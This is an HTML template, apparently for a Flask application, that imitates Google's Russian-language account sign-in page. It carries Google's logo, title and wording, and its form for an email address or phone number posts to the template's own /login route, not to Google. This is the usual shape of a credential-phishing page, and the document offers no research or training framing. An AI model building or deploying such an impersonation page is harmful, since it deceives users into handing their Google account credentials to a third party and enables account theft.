<!DOCTYPE html>
<html lang="ru">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Вход – Google Аккаунты</title>
  <link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}">
  <link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
</head>
<body>
  <div class="container">
    <img src="https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png" alt="Google" class="logo">

    <h1>Вход</h1>
    <p class="subtitle">Используйте аккаунт Google</p>

    <form method="POST" action="/login">
      <input type="text" placeholder="Телефон или адрес эл. почты" class="input" name="email" required />

      <a href="#" class="link">Забыли адрес электронной почты?</a>

      <p class="guest-text">
        Не ваш компьютер? Включите гостевой режим, чтобы защитить данные в аккаунте.
        <a href="#" class="link">Подробнее об использовании гостевого режима</a>
      </p>

      <div class="bottom-links">
        <a href="#" class="link">Создать аккаунт</a>
        <button type="submit" class="next-btn">Далее</button>
      </div>
    </form>

    <footer>
      <span>Русский</span>
    </footer>
  </div>
</body>
</html>